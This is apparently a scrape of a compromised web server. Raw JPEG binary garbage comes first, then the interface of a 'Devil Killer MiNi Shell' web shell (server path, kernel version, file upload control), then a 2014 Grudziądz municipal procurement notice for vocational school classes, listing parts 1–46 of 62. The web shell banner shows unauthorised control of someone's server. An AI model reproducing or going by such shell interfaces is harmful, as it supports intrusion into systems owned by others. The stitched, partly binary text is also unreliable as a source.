JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140709/229898-N-2014.html

<p class="kh_header"><b>Grudziądz: Świadczenie usług edukacyjnych w ramach projektu Nowa jakość kształcenia zawodowego w grudziądzkich szkołach - Część VI. Zajęcia specjalistyczne przygotowujące do wejścia na rynek pracy dla uczniów Zespołu Szkół Mechanicznych, Zespołu Szkół Gastronomiczno-Hotelarskich, Zespołu Szkół Rolniczych</b><br>
<b>Numer ogłoszenia: 229898 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 4510233, faks 56 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych w ramach projektu Nowa jakość kształcenia zawodowego w grudziądzkich szkołach - Część VI. Zajęcia specjalistyczne przygotowujące do wejścia na rynek pracy dla uczniów Zespołu Szkół Mechanicznych, Zespołu Szkół Gastronomiczno-Hotelarskich, Zespołu Szkół Rolniczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych dla uczniów Zespołu Szkół Mechanicznych, Zespołu Szkół Rolniczych, Zespołu Szkół Gastronomiczno-Hotelarskich w Grudziądzu w ramach projektu: Nowa jakość kształcenia zawodowego w grudziądzkich szkołach współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Świadczenie usług edukacyjnych polegać będzie na przeprowadzeniu zajęć specjalistycznych. Zajęcia specjalistyczne (z wyjątkiem części nr 53) odbywać się będą w Zespole Szkół Rolniczych w Grudziądzu, ul. Lipowa 33, w Zespole Szkół Gastronomiczno - Hotelarskich w Grudziądzu, ul. M. Curie - Skłodowskiej 22/24, w Zespole Szkół Mechanicznych w Grudziądzu, ul. Hallera 31 od poniedziałku do soboty, oprócz dni świątecznych. Zajęcia wymienione w części nr 53 Wykonawca przeprowadzi na terenie Grudziądza z uwzględnieniem warunków zamieszczonych w szczegółowym opisie. 
W trakcie realizacji zamówienia Wykonawca zobowiązany będzie:
1.w stosunku do części od nr 6 do nr 52 i od nr 58 do nr 60:
a) zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki: 
- ma co najmniej 2-letnie doświadczenie w pracy w szkole lub placówce, o których mowa w art. 2 i art. 3 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz.U. z 2004 r. Nr 256, poz.2572 z późn.zm.), 
- ma wykształcenie wyższe z przygotowaniem pedagogicznym lub wykształcenie wyższe i przygotowanie pedagogiczne, 
- spełnia wymagania kwalifikacyjne do prowadzenia zajęć stanowiących przedmiot tej części zamówienia, na którą Wykonawca składa ofertę, zgodnie z przepisami rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (t.j. Dz.U. 2013 r. poz. 1207);
2.w stosunku do części od nr 1 do nr 2:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma przygotowanie pedagogiczne,
- ma ukończony kurs kwalifikacyjny w zakresie prowadzonych zajęć,
- ma co najmniej 2- letnie doświadczenie w pracy w zawodzie barman lub barista lub w prowadzeniu zajęć praktycznych w tym zawodzie lub szkoleń w tym zakresie;          
3.w stosunku do części nr 3:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma przygotowanie pedagogiczne,
- ma ukończony kurs kwalifikacyjny w zakresie prowadzonych zajęć,
- ma co najmniej 2- letnie doświadczenie w prowadzeniu zajęć praktycznych lub szkoleń z carvingu;            
4.w stosunku do części nr 4:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma przygotowanie pedagogiczne,
- ma ukończony kurs kwalifikacyjny w zakresie prowadzonych zajęć,
- ma co najmniej 2- letnie doświadczenie w prowadzeniu zajęć praktycznych lub szkoleń z ręcznego wyrobu pralin;  
5.w stosunku do części nr 5:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma wykształcenie wyższe magisterskie,
- ma przygotowanie pedagogiczne,
- ma co najmniej 5-letnie doświadczenie w prowadzeniu zajęć w zakresie protokołu dyplomatycznego i savoir vivre oraz urządzaniu spotkań i wizyt konsularnych lub międzynarodowych konferencji naukowych i spotkań;
6.w stosunku do części od nr 6 do nr 8:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma wykształcenie wyższe w zakresie hotelarstwa lub ukończone studia podyplomowe w tym zakresie,
7.w stosunku do części od nr 9 do nr 11:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma wykształcenie wyższe w zakresie hotelarstwa lub ukończone studia podyplomowe w tym zakresie,
- ma co najmniej 2 letnie doświadczenie w pracy w zawodzie hotelarz lub w zakresie prowadzenia zajęć praktycznych w tym zawodzie;
8.w stosunku do części od nr 15 do nr 52 :
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma wykształcenie wyższe gastronomiczne lub ukończone studia podyplomowe w tym zakresie;
9.w stosunku do części nr 53:
a) zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma uprawnienia spawacza potwierdzone ważnym świadectwem egzaminu spawacza według normy PN - EN 287-1 lub PN - EN ISO 9606 w metodzie spawania TIG (141),
- ma przygotowanie pedagogiczne,
- ma co najmniej 2 lata doświadczenia w pracy spawacza lub w prowadzeniu zajęć praktycznych ze spawania;
10.w stosunku do części od nr 54 do nr 57:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma kwalifikacje do prowadzenia szkoleń w zakresie środków  ochrony roślin zgodnie z przepisami rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 8 maja  2013r. w sprawie szkoleń w zakresie środków  ochrony roślin (Dz.U. poz. 554);
11.w stosunku do części od nr 58 do nr 60:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma wykształcenie wyższe w zakresie ogrodnictwa lub architektury krajobrazu lub ukończone studia podyplomowe w wymaganych zakresach; 
12.w stosunku do części nr 61:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
-  ma uprawnienia w zakresie nauki jazdy zgodnie z przepisami Ustawy z dnia 5 stycznia 2011r. o kierujących pojazdami z późniejszymi zmianami;
13.w stosunku do części nr 62:
a)zapewnić w wykonywaniu zamówienia udział osoby spełniającej następujące warunki:
- ma ukończony kurs obsługi kombajnu.
Zamówienie podzielone jest na 62 części.
Część 1. Zajęcia specjalistyczne - barista. Łącznie - 64 h dla 30 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 2. Zajęcia specjalistyczne - barman. Łącznie - 64 h dla 30 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 3. Zajęcia specjalistyczne z carvingu. Łącznie - 32 h dla 40 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 4. Zajęcia specjalistyczne w zakresie ręcznego wyrobu pralin. Łącznie - 16 h dla 40 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 5. Zajęcia specjalistyczne z zakresu protokołu dyplomatycznego i savoir vivre. Łącznie - 60 h dla 60 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 6. Zajęcia specjalistyczne z zakresu hotelarstwa (zajęcia teoretyczne). Łącznie - 20 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 7. Zajęcia specjalistyczne z zakresu hotelarstwa (zajęcia teoretyczne). Łącznie - 20 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 8. Zajęcia specjalistyczne z zakresu hotelarstwa (zajęcia teoretyczne). Łącznie - 20 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 9. Zajęcia specjalistyczne z zakresu hotelarstwa (praktyczne). Łącznie - 20 h dla grupy 10 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 10. Zajęcia specjalistyczne z zakresu hotelarstwa (praktyczne). Łącznie - 20 h dla grupy 10 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 11. Zajęcia specjalistyczne z zakresu hotelarstwa (praktyczne). Łącznie - 20 h dla grupy 10 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 12. Zajęcia specjalistyczne z zakresu hotelarstwa. Łącznie - 20 h dla grupy 10 uczniów (język angielski). Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 13. Zajęcia specjalistyczne z zakresu hotelarstwa. Łącznie - 20 h dla grupy 10 uczniów (język angielski). Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 14. Zajęcia specjalistyczne z zakresu hotelarstwa. Łącznie - 20 h dla grupy 10 uczniów (język angielski). Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 15. Zajęcia specjalistyczne z zakresu żywienia i żywności. Łącznie - 45 h dla grupy 10 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 16. Zajęcia specjalistyczne z zakresu żywienia i żywności. Łącznie - 45 h dla grupy 10 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 17. Zajęcia specjalistyczne z zakresu żywienia i żywności. Łącznie - 45 h dla grupy 10 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 18. Zajęcia specjalistyczne z zakresu ciastkarstwa artystycznego. Łącznie - 40 h dla grupy 12 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 19. Zajęcia specjalistyczne z zakresu ciastkarstwa artystycznego. Łącznie - 40 h dla grupy 12 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 20. Zajęcia specjalistyczne z zakresu ciastkarstwa artystycznego. Łącznie - 40 h dla grupy 12 uczniów. Miejsce:  Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 21. Zajęcia specjalistyczne z zakresu nowoczesnej kuchni XXI wieku. Łącznie - 40 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 22. Zajęcia specjalistyczne z zakresu nowoczesnej kuchni XXI wieku. Łącznie - 40 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 23. Zajęcia specjalistyczne z zakresu nowoczesnej kuchni XXI wieku. Łącznie - 40 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 24. Zajęcia specjalistyczne z zakresu wiedzy i umiejętności praktycznych stosowanych w nowoczesnej kuchni. Łącznie - 45 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 25. Zajęcia specjalistyczne z zakresu wiedzy i umiejętności praktycznych stosowanych w nowoczesnej kuchni. Łącznie - 45 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 26. Zajęcia specjalistyczne z zakresu wiedzy i umiejętności praktycznych stosowanych w nowoczesnej kuchni. Łącznie - 45 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich, ul. Curie-Skłodowskiej 22/24, 86-300 Grudziądz. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 27. Zajęcia specjalistyczne Uczta w Soplicowie- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Pan Tadeusz). Łącznie - 15 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 28. Zajęcia specjalistyczne Uczta w Soplicowie- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Pan Tadeusz). Łącznie - 12 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 29. Zajęcia specjalistyczne Uczta w Soplicowie- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Pan Tadeusz). Łącznie - 3 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.		
Część 30. Zajęcia specjalistyczne Uczta w Soplicowie- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Pan Tadeusz). Łącznie - 15 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 31. Zajęcia specjalistyczne Uczta w Soplicowie- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę  (Pan Tadeusz). Łącznie - 12 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 32. Zajęcia specjalistyczne Uczta w Soplicowie- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Pan Tadeusz). Łącznie - 3 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.		
Część 33. Zajęcia specjalistyczne Kulinarne Przedwiośnie - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Przedwiośnie). Łącznie -15 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 34. Zajęcia specjalistyczne Kulinarne Przedwiośnie - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Przedwiośnie). Łącznie - 12 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 35. Zajęcia specjalistyczne Kulinarne Przedwiośnie - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Przedwiośnie). Łącznie - 3 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 36. Zajęcia specjalistyczne Kulinarne Przedwiośnie - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Przedwiośnie). Łącznie -15 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 37. Zajęcia specjalistyczne Kulinarne Przedwiośnie - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Przedwiośnie). Łącznie - 12 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 38. Zajęcia specjalistyczne Kulinarne Przedwiośnie - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego w oparciu o literaturę (Przedwiośnie). Łącznie - 3 h dla grupy 12 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 39. Zajęcia specjalistyczne Biesiada Staropolska - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 40. Zajęcia specjalistyczne Biesiada Staropolska - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 6 h dla grupy 16 uczniów. Zakres programowy: przygotowywanie potraw. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 41. Zajęcia specjalistyczne Biesiada Staropolska - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 4 h dla grupy 16 uczniów. Zakres programowy- obsługa klienta. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.		
Część 42. Zajęcia specjalistyczne Biesiada Staropolska - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 43. Zajęcia specjalistyczne Biesiada Staropolska - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 6 h dla grupy 16 uczniów. Zakres programowy: przygotowywanie potraw. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 44. Zajęcia specjalistyczne Biesiada Staropolska - zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 4 h dla grupy 16 uczniów. Zakres programowy- obsługa klienta. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 45. Zajęcia specjalistyczne U króla Stasia - obiady czwartkowe- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Program zajęć oparty o literaturę: M. Lemnis, H. Vitry, W staropolskiej kuchni i przy polskim stole, B. Jakimowicz-Klein, J. Tomkowski: Kuchnia Literacka. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 46. Zajęcia specjalistyczne U króla Stasia - obiady czwartkowe- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Zakres programowy - przygotowywanie potraw. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
